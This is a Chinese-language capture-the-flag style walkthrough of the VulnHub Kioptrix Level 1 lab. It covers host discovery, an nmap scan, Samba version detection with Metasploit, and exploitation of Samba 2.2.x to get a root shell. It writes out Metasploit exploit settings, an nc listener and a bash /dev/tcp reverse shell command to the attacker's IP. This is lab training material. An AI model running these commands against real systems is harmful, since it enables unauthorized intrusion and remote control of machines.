目录
环境安装
信息收集
0X01靶机IP搜寻
1.1ifconfig查看本机IP域
1.2.nmap搜寻IP
2.直接arp-scan指令查看IP
0X02端口扫描
0X03漏洞利用
反弹shell
另一种通关方法推荐
环境安装
靶机下载:https://download.vulnhub.com/kioptrix/Kioptrix_Level_1.rar
攻击机:kali2023
开始渗透!!!
信息收集
0X01靶机IP搜寻
1.1ifconfig查看本机IP域
1.2.nmap搜寻IP
2.直接arp-scan指令查看IP
arp-scan -l
0X02端口扫描
nmap -A -p- 192.168.232.129
发现Samba的绑定服务器的139端口,我们使用msf探测一下Samba的版本
msfconsole
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.232.129
run
0X03漏洞利用
msf搜索samba
search samba
使用现成的
注意一下可以使用的版本为Samba 2.2.x - Bruteforce所以可以使用
再利用
set payload linux/x86/shell_bind_tcp
set rhosts 192.168.232.129
show options
run
成功rce,已经拿到root权限。
反弹shell
先监听攻击机kali端口1234
nc -lvp 1234
然后就是rce输入反弹shell命令(此处由于kali的IP写错了,多写了几次)
bash -i >& /dev/tcp/192.168.232.128/1234 0>&1
发现成功连接,反弹shell
另一种通关方法推荐
推文:https://www.cnblogs.com/jason-huawen/p/16950944.html
但是我看在其中一步,没能成功getshell!